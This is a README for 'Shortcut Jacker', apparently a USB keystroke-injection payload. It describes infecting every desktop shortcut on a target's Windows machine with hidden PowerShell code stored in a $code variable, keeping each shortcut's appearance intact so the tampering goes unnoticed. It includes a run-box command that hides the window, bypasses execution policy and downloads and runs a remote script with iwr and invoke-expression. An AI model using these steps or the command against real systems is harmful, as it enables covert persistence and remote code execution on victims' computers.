
Table of Contents
- Description
- Getting Started
- Contributing
- Version History
- Contact
- Acknowledgments
# Shortcut Jacker
YouTube Tutorial
A script used to embed malware in the shortcut on your targets desktop
## Description
This payload will run a powershell script in the background of any shortcut used on the targets desktop.
This is done by taking advantage of the `Target` field where powershell commands can be stored or run.
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run.
So if your command exceeds that consider using an IWR function to download and execute a longer script.
I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored.
---------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------
Using the `Get-Shortcut` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the `Target` field.
## Getting Started
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file
### Dependencies
* An internet connection
* Windows 10,11
(back to top)
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
(back to top)
## Contributing
All contributors names will be listed here
I am Jakoby
(back to top)
## Version History
* 0.1
* Initial Release
(back to top)
## Contact
📱 My Socials 📱
YouTube
|
Twitter
|
Instagram
|
Discord
|
TikTok
|
(back to top)
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
(back to top)